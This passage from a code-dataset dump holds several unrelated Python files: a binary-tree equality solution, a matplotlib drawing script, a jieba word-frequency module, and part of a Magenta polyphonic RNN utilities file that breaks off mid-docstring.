Output: false\n# Example 3:\n# \n# Input: 1 1\n# / \\ / \\\n# 2 1 1 2\n# \n# [1,2,1], [1,1,2]\n# \n# Output: false\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n # @param p, TreeNode\n # @param q, TreeNode\n # @return boolean\n def isSameTree(self, p, q):\n if not p and not q:\n return True\n elif not p or not q or p.val != q.val:\n return False\n else:\n return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)\n\nclass Solution_2:\n def isSameTree(self, p, q):\n stk = []\n stk.append(p)\n stk.append(q)\n while stk:\n n1 = stk.pop()\n n2 = stk.pop()\n if not n1 and not n2:\n continue\n elif not n1 or not n2 or n1.val != n2.val:\n return False\n else:\n stk.append(n1.left)\n stk.append(n2.left)\n stk.append(n1.right)\n stk.append(n2.right)\n return True\n\n# Main\nif __name__ == '__main__':\n n0 = TreeNode(1)\n n1 = TreeNode(2)\n n2 = TreeNode(3)\n n0.left, n0.right = n1, n2\n\n m0 = TreeNode(1)\n m1 = TreeNode(2)\n m2 = TreeNode(3)\n m0.left, m0.right = m1, m2\n\n print('----- Solution 1 -----')\n print(Solution().isSameTree(n0, m0))\n print('----- Solution 2 -----')\n print(Solution_2().isSameTree(n0, m0))\n","sub_path":"100_SameTree.py","file_name":"100_SameTree.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"581083071","text":"from matplotlib.patches import Circle\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\t# Longueur des cotés du carré\nx = np.arange(-0.5, 0.6, 0.1)\n\t# Rayon des cercles\nr = 0.5\n\t# Marges des figures\nmargins = [0.2, 0.15, 0.7, 0.8]\n\n\t# Création de la figure et des axes\nfig = plt.figure(figsize = (4, 4), dpi = 200)\nax = fig.add_axes(margins)\nax.set_ylim(-1.2, 1.2)\nax.set_xlim(-1.2, 1.2)\nax.set_aspect(\"equal\")\n\n\t# Traçage du carré\ncote1 = ax.plot(x, 0*x + 0.5, \"g\")\ncote2 = ax.plot(x, 0*x - 0.5, \"g\")\ncote3 = ax.plot(0*x + 0.5, x, \"g\")\ncote4 = ax.plot(0*x - 0.5, x, \"g\")\n\n\t# Traçage des cercles\ncercle1 = plt.Circle((0.5, 0.5), r, color = \"r\", fill = True)\ncercle2 = plt.Circle((0.5, -0.5), r, color = \"y\", fill = True)\ncercle3 = plt.Circle((-0.5, 0.5), r, color = \"c\", fill = True)\ncercle4 = plt.Circle((-0.5, -0.5), r, color = \"b\", fill = True)\nax.add_artist(cercle1)\nax.add_artist(cercle2)\nax.add_artist(cercle3)\nax.add_artist(cercle4)\n\n\t# Titre des axes\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.minorticks_on()\n\n\t# Afficher les axes\nax.axhline(y = 0, color = \"k\")\nax.axvline(x = 0, color = \"k\")\n\nplt.title(\"Figure 1\")\nplt.figtext(0.05, 0.07, \"Figure 1 : Carré de coté 1 centré au point (0, 0), avec des cercles remplies aux sommets\", fontsize = \"xx-small\", wrap = True)\nplt.savefig(\"figure1.png\")\nplt.show()\n","sub_path":"source/tp/3/question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"120985501","text":"from collections import Counter\nimport jieba\n\n# 创建一个函数,统计参数中每个英文单词词频\ndef stats_text_en(text,count):\n elements = text.split()\n words = []\n symbols = ',.*-!'\n for element in elements:\n for symbol in symbols:\n element = element.replace(symbol,'')\n # 用 str 类型的 isascii 方法判断是否是英文单词\n if len(element) and element.isascii():\n words.append(element)\n return Counter(words).most_common(count)\n\n\n#定义一个函数,统计参数中每个中文汉字出现的次数\ndef stats_text_cn(text,count):\n characters_cn = []\n characters_1 = jieba.cut(text,cut_all=False)\n for character in characters_1:\n if len(character) >= 2:\n characters_cn.append(character)\n return Counter(characters_cn).most_common(count)\n\n\n# 创建一个函数,分别调用stats_text_en和stats_text_cn\ndef stats_text(text,count):\n \"\"\"\n 分别调用stats_word_en和stats_text_cn函数,输出合并词频统计结果\n \"\"\"\n if not isinstance(text,str):\n raise ValueError('输入参数必须为str类型,当前输入类型为%s'%type(text))\n return stats_text_en(text,count) + stats_text_cn(text,count)\n","sub_path":"exercises/1901090061/d12/mymodule/stats_word.py","file_name":"stats_word.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"374146927","text":"# Copyright 2016 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utilities for polyphonic RNN.\"\"\"\n\nfrom collections import OrderedDict\nimport copy\nimport os\nimport uuid\n\n# internal imports\n\nimport numpy as np\nfrom scipy import linalg\nimport tensorflow as tf\n\nimport magenta.music as mm\nfrom magenta.protobuf import music_pb2\n\n# This list represents the duration times (in seconds) that are supported.\n# If an input NoteSequence contains a note duration that is not in this list,\n# the entire NoteSequence will be discarded.\n# TODO(fjord): this filtering should happen at dataset creation time.\nTIME_CLASSES = [0.125, 0.25, 0.5, 0.75, 1.0, 1.5, 2.0, 3.0, 4.0, 6.0, 8.0, 12.0]\n\n##\n# begin metautils\n##\n\n\ndef shape(x):\n \"\"\"Returns tensor shape as a tuple of integers, None dimensions as -1.\"\"\"\n return tuple([-1 if d is None else d for d in x.get_shape().as_list()])\n\n\ndef ndim(x):\n \"\"\"Returns the number of dimensions of the TensorFlow variable `x`.\n\n Args:\n x: A TensorFlow tensor object.\n\n Returns:\n An integer denoting the number of dimensions in `x`.\n \"\"\"\n return x.get_shape().ndims\n\n\ndef dot(a, b):\n # Generalized dot for nd sequences, assumes last axis is projection\n # b must be rank 2\n a_tup = shape(a)\n b_tup = shape(b)\n a_i = tf.reshape(a, [-1, a_tup[-1]])\n a_n = tf.matmul(a_i, b)\n a_n = tf.reshape(a_n, list(a_tup[:-1]) + [b_tup[-1]])\n return a_n\n\n\ndef ni_slice(sub_values, last_ind, axis=0):\n # TODO: Allow both to be negative indexed...\n ndims = len(shape(sub_values))\n im1 = 0 + abs(last_ind)\n i = [[None, None]] * ndims\n i[axis] = [im1, None]\n am = [False] * ndims\n am[axis] = True\n sl = [slice(*ii) for ii in i]\n ti = tf.reverse(sub_values, am)[sl]\n return tf.reverse(ti, am)\n\n\ndef ni(t, ind, axis=0):\n # Negative single index helper\n ndims = len(shape(t))\n im1 = -1 + abs(ind)\n i = [[None, None]] * ndims\n i[axis] = [im1, im1 + 1]\n am = [False] * ndims\n am[axis] = True\n sl = [slice(*ii) for ii in i]\n ti = tf.reverse(t, am)[sl]\n return ti[0, :, :]\n\n\ndef scan(fn, sequences, outputs_info):\n # for some reason TF step needs initializer passed as first argument?\n # a tiny wrapper to tf.scan to make my life easier\n # closer to theano scan, allows for step functions with multiple arguments\n # may eventually have kwargs which match theano\n for i in range(len(sequences)):\n # Try to accomodate for masks...\n seq = sequences[i]\n nd = ndim(seq)\n if nd == 3:\n pass\n elif nd < 3:\n sequences[i] = tf.expand_dims(sequences[i], nd)\n else:\n raise ValueError('Ndim too different to correct')\n\n def check(l):\n shapes = [shape(s) for s in l]\n # for now assume -1, can add axis argument later\n # check shapes match for concatenation\n compat = [ls for ls in shapes if ls[:-1] == shapes[0][:-1]]\n if len(compat) != len(shapes):\n raise ValueError('Tensors *must* be the same dim for now')\n\n check(sequences)\n check(outputs_info)\n\n seqs_shapes = [shape(s) for s in sequences]\n nd = len(seqs_shapes[0])\n seq_pack = tf.concat(nd - 1, sequences)\n outs_shapes = [shape(o) for o in outputs_info]\n nd = len(outs_shapes[0])\n init_pack = tf.concat(nd - 1, outputs_info)\n\n assert len(shape(seq_pack)) == 3\n assert len(shape(init_pack)) == 2\n\n def s_e(shps):\n starts = []\n ends = []\n prev_shp = 0\n for _, shp in enumerate(shps):\n start = prev_shp\n end = start + shp[-1]\n starts.append(start)\n ends.append(end)\n prev_shp = end\n return starts, ends\n\n # TF puts the initializer in front?\n def fnwrap(initializer, elems):\n starts, ends = s_e(seqs_shapes)\n sliced_elems = [elems[:, start:end] for start, end in zip(starts, ends)]\n starts, ends = s_e(outs_shapes)\n sliced_inits = [initializer[:, start:end]\n for start, end in zip(starts, ends)]\n t = []\n t.extend(sliced_elems)\n t.extend(sliced_inits)\n # elems first then inits\n outs = fn(*t)\n nd = len(outs_shapes[0])\n outs_pack = tf.concat(nd - 1, outs)\n return outs_pack\n\n r = tf.scan(fnwrap, seq_pack, initializer=init_pack)\n\n if len(outs_shapes) > 1:\n starts, ends = s_e(outs_shapes)\n o = [r[:, :, start:end] for start, end in zip(starts, ends)]\n return o\n else:\n return r\n\n##\n# end metautils\n##\n\n##\n# begin datasets\n##\n\n\ndef duration_and_pitch_to_midi(filename, durations, pitches, prime_until=0):\n # durations and pitches should both be 2D\n # [time_steps, n_notes]\n\n sequence = music_pb2.NoteSequence()\n\n # Hardcode for now, eventually randomize?\n # or predict...\n sequence.ticks_per_quarter = mm.STANDARD_PPQ\n ts = sequence.time_signatures.add()\n ts.time = 1.0\n ts.numerator = 4\n ts.denominator = 4\n\n ks = sequence.key_signatures.add()\n ks.key = 0\n ks.mode = ks.MAJOR\n\n tempos = sequence.tempos.add()\n tempos.qpm = 120\n # ti.simultaneous_notes\n sn = 4\n\n # Translate durations from TIME_CLASSES indexes to TIME_CLASSES values.\n # First, find the data to change, then change it.\n # If we don't do this as separate steps, we'll end up changing some data\n # more than once.\n dt = copy.deepcopy(durations)\n time_class_indexes = []\n for i in range(len(TIME_CLASSES)):\n time_class_indexes.append(dt == i)\n for i, time in enumerate(TIME_CLASSES):\n dt[time_class_indexes[i]] = time\n\n delta_times = [dt[..., i] for i in range(sn)]\n end_times = [delta_times[i].cumsum(axis=0) for i in range(sn)]\n start_times = [end_times[i] - delta_times[i] for i in range(sn)]\n voices = [pitches[..., i] for i in range(sn)]\n\n midi_notes = []\n default_instrument = 0\n default_program = 0\n priming_instrument = 79\n priming_program = 79\n sequence.total_time = float(max([end_times[i][-1] for i in range(sn)]))\n\n assert len(delta_times[0]) == len(voices[0])\n for n in range(len(delta_times[0])):\n for i in range(len(voices)):\n # Hardcode 1 sample for now\n v = voices[i][n]\n s = start_times[i][n]\n e = end_times[i][n]\n if v != 0.:\n # Skip silence voices... for now\n # namedtuple?\n if n >= prime_until:\n midi_notes.append((default_instrument, default_program, v, s, e))\n else:\n midi_notes.append((priming_instrument, priming_program, v, s, e))\n for tup in midi_notes:\n sequence_note = sequence.notes.add()\n i = tup[0]\n p = tup[1]\n v = tup[2]\n s = tup[3]\n e = tup[4]\n sequence_note.instrument = int(i)\n sequence_note.program = int(p)\n sequence_note.pitch = int(v)\n sequence_note.velocity = int(127.)\n sequence_note.start_time = float(s)\n sequence_note.end_time = float(e)\n\n pretty_midi_object = mm.sequence_proto_to_pretty_midi(sequence)\n pretty_midi_object.write(filename)\n\n\nclass TFRecordDurationAndPitchIterator(object):\n\n def __init__(self, files_path, minibatch_size, start_index=0,\n stop_index=np.inf, make_mask=False,\n sequence_length=None,\n randomize=True):\n \"\"\"Supports regular int, negative indexing, or float for stop_index.\"\"\"\n reader = mm.note_sequence_io.note_sequence_record_iterator(files_path)\n all_ds = []\n all_ps = []\n self.note_classes = list(np.arange(88 + 1)) # + 1 for silence\n # set automatically\n # self.simultaneous_notes = int(max(np.sum(self._data, axis=0)))\n self.simultaneous_notes = 4\n time_classes_set = set(TIME_CLASSES)\n for ns in reader:\n notes = ns.notes\n st = np.array([n.start_time for n in notes]).astype('float32')\n et = np.array([n.end_time for n in notes]).astype('float32')\n pi = np.array([n.pitch for n in notes]).astype('float32')\n\n sample_times = sorted(list(set(st)))\n # go straight for pitch and delta time encoding\n sn = self.simultaneous_notes\n pitch_slices = [pi[st == sti][::-1] for sti in sample_times]\n # This monster fills in 0s so that array size is consistent\n pitch_slices = [p[:sn] if len(p) >= sn\n else\n np.concatenate((p, np.array([0.] * (sn - len(p)),\n dtype='float32')))\n for p in pitch_slices]\n start_slices = [st[st == sti] for sti in sample_times]\n end_slices = [et[st == sti] for sti in sample_times]\n start_slices = [ss[:sn] if len(ss) >= sn\n else\n np.concatenate((ss, np.array([ss[0]] * (sn - len(ss)),\n dtype='float32')))\n for ss in start_slices]\n end_slices = [es[:sn] if len(es) >= sn\n else\n np.concatenate((es, np.array([max(es)] * (sn - len(es)),\n dtype='float32')))\n for es in end_slices]\n start_slices = np.array(start_slices)\n end_slices = np.array(end_slices)\n delta_slices = end_slices - start_slices\n unsupported_time_classes = set(delta_slices.ravel()) - time_classes_set\n if unsupported_time_classes:\n tf.logging.warning(\n 'NoteSequence %s:%s has unsupported time classes %s and will be '\n 'skipped',\n ns.id, ns.filename, unsupported_time_classes)\n continue\n all_ds.append(np.array(delta_slices))\n all_ps.append(np.array(pitch_slices))\n assert len(all_ds) == len(all_ps)\n all_ds = np.concatenate(all_ds)\n all_ps = np.concatenate(all_ps)\n\n self._min_time_data = np.min(all_ds)\n self._max_time_data = np.max(all_ds)\n\n truncate = len(all_ds) - len(all_ds) % minibatch_size\n all_ds = all_ds[:truncate]\n all_ps = all_ps[:truncate]\n\n # transpose necessary to preserve data structure!\n # cut the audio into long contiguous subsequences based on the minibatch\n # size.\n all_ds = all_ds.transpose(1, 0)\n all_ds = all_ds.reshape(-1, minibatch_size,\n all_ds.shape[1] // minibatch_size)\n all_ds = all_ds.transpose(2, 1, 0)\n all_ps = all_ps.transpose(1, 0)\n all_ps = all_ps.reshape(-1, minibatch_size,\n all_ps.shape[1] // minibatch_size)\n all_ps = all_ps.transpose(2, 1, 0)\n\n len_ = len(all_ds)\n self._time_data = all_ds\n self._pitch_data = all_ps\n\n self.minibatch_size = minibatch_size\n self.sequence_length = sequence_length\n if randomize:\n self.random_state = np.random.RandomState(2177)\n self.make_mask = make_mask\n\n if stop_index >= 1:\n self.stop_index = int(min(stop_index, len_))\n elif stop_index > 0:\n # percentage\n self.stop_index = int(stop_index * len_)\n elif stop_index < 0:\n # negative index - must be int!\n self.stop_index = len_ + int(stop_index)\n\n self.start_index = start_index\n if start_index < 0:\n # negative indexing\n self.start_index = len_ + start_index\n elif start_index < 1:\n # float\n self.start_index = int(start_index * len_)\n else:\n # regular\n self.start_index = int(start_index)\n if self.start_index >= self.stop_index:\n ss = 'Invalid indexes - stop '\n ss += '%s <= start %s !' % (self.stop_index, self.start_index)\n raise ValueError(ss)\n self._current_index = self.start_index\n\n def __iter__(self):\n return self\n\n def next(self):\n return self.__next__()\n\n def __next__(self):\n s = self._current_index\n e = s + self.sequence_length\n if e > self.stop_index:\n raise StopIteration('End of file iterator reached!')\n time_data = np.array(self._time_data[s:e])\n\n # Translate durations from TIME_CLASSES values to TIME_CLASSES indexes.\n # First, find the data to change, then change it.\n # If we don't do this as separate steps, we'll end up changing some data\n # more than once.\n time_class_indexes = []\n for time in TIME_CLASSES:\n time_class_indexes.append(time_data == time)\n for i in range(len(TIME_CLASSES)):\n time_data[time_class_indexes[i]] = i\n\n pitch_data = np.array(self._pitch_data[s:e])\n\n if self.make_mask is False:\n res = (time_data, pitch_data)\n else:\n raise ValueError('Unhandled mask making')\n self._current_index = e\n return res\n\n def reset(self):\n self._current_index = self.start_index\n\n##\n# end datasets\n##\n\n##\n# begin initializers and Theano functions\n##\n\n\ndef np_zeros(shp):\n \"\"\"Builds a numpy variable filled with zeros.\n\n Args:\n shp: tuple of ints\n shape of zeros to initialize\n\n Returns:\n initialized_zeros, array-like\n Array-like of zeros the same size as shape parameter\n \"\"\"\n return np.zeros(shp).astype('float32')\n\n\ndef np_normal(shp, random_state, scale=0.01):\n \"\"\"Builds a numpy variable filled with normal random values.\n\n Args:\n shp: tuple of ints or tuple of tuples\n shape of values to initialize\n tuple of ints should be single shape\n tuple of tuples is primarily for convnets and should be of form\n ((n_in_kernels, kernel_width, kernel_height),\n (n_out_kernels, kernel_width, kernel_height))\n random_state: numpy.random.RandomState() object\n scale: float (default 0.01)\n default of 0.01 results in normal random values with variance 0.01\n\n Returns:\n initialized_normal, array-like\n Array-like of normal random values the same size as shape parameter\n \"\"\"\n if isinstance(shp[0], tuple):\n shp = (shp[1][0], shp[0][0]) + shp[1][1:]\n return (scale * random_state.randn(*shp)).astype('float32')\n\n\ndef np_tanh_fan_normal(shp, random_state, scale=1.):\n \"\"\"Builds a numpy variable filled with random values.\n\n Args:\n shp: tuple of ints or tuple of tuples\n shape of values to initialize\n tuple of ints should be single shape\n tuple of tuples is primarily for convnets and should be of form\n ((n_in_kernels, kernel_width, kernel_height),\n (n_out_kernels, kernel_width, kernel_height))\n random_state: numpy.random.RandomState() object\n scale: float (default 1.)\n default of 1. results in normal random values\n with sqrt(2 / (fan in + fan out)) scale\n\n Returns:\n initialized_fan, array-like\n Array-like of random values the same size as shape parameter\n\n References\n ----------\n Understanding the difficulty of training deep feedforward neural networks\n X. Glorot, Y. Bengio\n \"\"\"\n # The . after the 2 is critical! shape has dtype int...\n if isinstance(shp[0], tuple):\n kern_sum = np.prod(shp[0]) + np.prod(shp[1])\n shp = (shp[1][0], shp[0][0]) + shp[1][1:]\n else:\n kern_sum = np.sum(shp)\n var = scale * np.sqrt(2. / kern_sum)\n return var * random_state.randn(*shp).astype('float32')\n\n\ndef np_variance_scaled_uniform(shp, random_state, scale=1.):\n \"\"\"Builds a numpy variable filled with random values.\n\n Args:\n shp: tuple of ints or tuple of tuples\n shape of values to initialize\n tuple of ints should be single shape\n tuple of tuples is primarily for convnets and should be of form\n ((n_in_kernels, kernel_width, kernel_height),\n (n_out_kernels, kernel_width, kernel_height))\n random_state: numpy.random.RandomState() object\n scale: float (default 1.)\n default of 1. results in uniform random values\n with 1 * sqrt(1 / (n_dims)) scale\n\n Returns:\n initialized_scaled, array-like\n Array-like of random values the same size as shape parameter\n\n References\n ----------\n Efficient Backprop\n Y. LeCun, L. Bottou, G. Orr, K. Muller\n \"\"\"\n if isinstance(shp[0], tuple):\n shp = (shp[1][0], shp[0][0]) + shp[1][1:]\n kern_sum = np.prod(shp[0])\n else:\n kern_sum = shp[0]\n # Make sure bounds aren't the same\n bound = scale * np.sqrt(3. / kern_sum) # sqrt(3) for std of uniform\n return random_state.uniform(low=-bound, high=bound, size=shp).astype(\n 'float32')\n\n\ndef np_ortho(shp, random_state, scale=1.):\n \"\"\"Builds a numpy variable filled with orthonormal random values.\n\n Args:\n shp: tuple of ints or tuple of tuples\n shape of values to initialize\n tuple of ints should be single shape\n tuple of tuples is primarily for convnets and should be of form\n ((n_in_kernels, kernel_width, kernel_height),\n (n_out_kernels, kernel_width, kernel_height))\n random_state: numpy.random.RandomState() object\n scale: float (default 1.)\n default of 1. results in orthonormal random values sacled by 1.\n\n Returns:\n initialized_ortho, array-like\n Array-like of random values the same size as shape parameter\n\n References\n ----------\n Exact solutions to the nonlinear dynamics of learning in deep linear\n neural networks\n A. Saxe, J. McClelland, S. Ganguli\n \"\"\"\n if isinstance(shp[0], tuple):\n shp = (shp[1][0], shp[0][0]) + shp[1][1:]\n flat_shp = (shp[0], np.prd(shp[1:]))\n else:\n flat_shp = shp\n g = random_state.randn(*flat_shp)\n u, _, vt = linalg.svd(g, full_matrices=False)\n res = u if u.shape == flat_shp else vt # pick one with the correct shape\n res = res.reshape(shp)\n return (scale * res).astype('float32')\n\n\ndef make_numpy_biases(bias_dims):\n return [np_zeros((dim,)) for dim in bias_dims]\n\n\ndef make_numpy_weights(in_dim, out_dims, random_state, init=None,\n scale='default'):\n \"\"\"\n Will return as many things as are in the list of out_dims\n You *must* get a list back, even for 1 element retuTrue\n blah, = make_weights(...)\n or\n [blah] = make_weights(...)\n \"\"\"\n ff = [None] * len(out_dims)\n for i, out_dim in enumerate(out_dims):\n if init is None:\n if in_dim == out_dim:\n ff[i] = np_ortho\n else:\n ff[i] = np_variance_scaled_uniform\n else:\n raise ValueError('Unknown init type %s' % init)\n if scale == 'default':\n ws = [ff[i]((in_dim, out_dim), random_state)\n for i, out_dim in enumerate(out_dims)]\n else:\n ws = [ff[i]((in_dim, out_dim), random_state, scale=scale)\n for i, out_dim in enumerate(out_dims)]\n return ws\n\n\n# Storage of internal shared\n_lib_shared_params = OrderedDict()\n\n\ndef _get_name():\n return str(uuid.uuid4())\n\n\ndef _get_shared(name):\n if name in _lib_shared_params.keys():\n tf.logging.info('Found name %s in shared parameters' % name)\n return _lib_shared_params[name]\n else:\n raise NameError('Name not found in shared params!')\n\n\ndef _set_shared(name, variable):\n if name in _lib_shared_params.keys():\n raise ValueError('Trying to set key %s which already exists!' % name)\n _lib_shared_params[name] = variable\n\n\ndef embedding(indices, n_symbols, output_dim, random_state, name=None):\n \"\"\"Last dimension of indices tensor must be 1!!!!\"\"\"\n if name is None:\n name = _get_name()\n\n try:\n vectors = _get_shared(name)\n except NameError:\n vectors = tf.Variable(\n random_state.randn(n_symbols, output_dim).astype('float32'),\n trainable=True)\n _set_shared(name, vectors)\n\n ii = tf.cast(indices, 'int32')\n shp = shape(ii)\n nd = len(shp)\n lu = tf.nn.embedding_lookup(vectors, ii)\n if nd == 3:\n lu = lu[:, :, 0, :]\n else:\n return lu\n return lu\n\n\ndef multiembedding(multi_indices, n_symbols, output_dim, random_state,\n name=None, share_all=False):\n \"\"\"Helper to compute many embeddings and concatenate.\n\n Requires input indices to be 3D, with last axis being the \"iteration\"\n dimension\n \"\"\"\n # Should n_symbols be a list of embedding values?\n output_embeds = []\n shp = shape(multi_indices)\n if len(shp) != 3:\n raise ValueError('Unhandled rank != 3 for input multi_indices')\n index_range = shp[-1]\n if share_all:\n if name is None:\n n = _get_name()\n names = [n] * index_range\n else:\n names = [name + '_0' for i in range(index_range)]\n else:\n if name is None:\n names = [_get_name() for i in range(index_range)]\n else:\n names = [name + '_%i' % i for i in range(index_range)]\n for i in range(index_range):\n e = embedding(multi_indices[:, :, i], n_symbols, output_dim, random_state,\n name=names[i])\n output_embeds.append(e)\n return tf.concat(2, output_embeds)\n\n\ndef automask(input_tensor, n_masks, axis=-1):\n \"\"\"Auto masker to make multiple MADE/pixelRNN style masking easier.\n\n n_masks *must* be an even divisor of input_tensor.shape[axis]\n\n masks are basically of form\n\n [:, :, :i * divisor_dim] = 1.\n for i in range(n_masks)\n\n a 1, 4 example with n_masks = 2 would be\n\n mask0 = [0., 0., 0., 0.]\n mask1 = [1., 1., 0., 0.]\n\n The goal of these masks is to model p(y_i,t | x_<=t, y_